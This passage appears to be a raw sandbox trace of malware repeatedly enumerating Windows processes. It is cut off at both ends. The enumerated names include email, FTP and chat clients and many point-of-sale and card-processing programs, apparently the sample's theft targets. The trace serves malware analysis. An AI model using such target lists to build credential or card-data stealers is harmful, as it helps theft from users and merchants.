th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0217.548] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0217.550] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0217.552] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0217.553] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0217.555] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0217.557] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0217.560] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0217.562] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0217.607] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0217.609] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0217.611] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0217.613] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0217.615] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0217.617] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0217.618] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0217.620] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0217.627] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0217.629] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0217.631] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0217.632] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0217.634] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0217.636] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0217.638] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0217.640] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0217.642] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0217.643] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0217.645] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0217.685] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0217.687] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0217.689] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0217.691] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0217.693] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0217.694] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0217.696] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.697] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0217.699] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0217.701] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0217.702] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0217.704] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0217.705] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0217.707] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0217.709] CloseHandle (hObject=0x1eb8) returned 1 [0217.709] Sleep (dwMilliseconds=0x64) [0217.744] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0217.795] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.797] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.798] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.800] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.801] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.803] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.804] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.806] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.808] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.809] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.821] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.823] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.825] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.826] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.828] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.829] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.831] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.832] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.834] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.835] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.875] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0217.876] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.878] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0217.879] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.881] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0217.882] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0217.884] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0217.886] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0217.887] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0217.889] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0217.890] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.892] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.893] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0217.895] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.896] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0217.898] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.900] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0217.901] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0217.903] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0217.904] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0217.906] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: 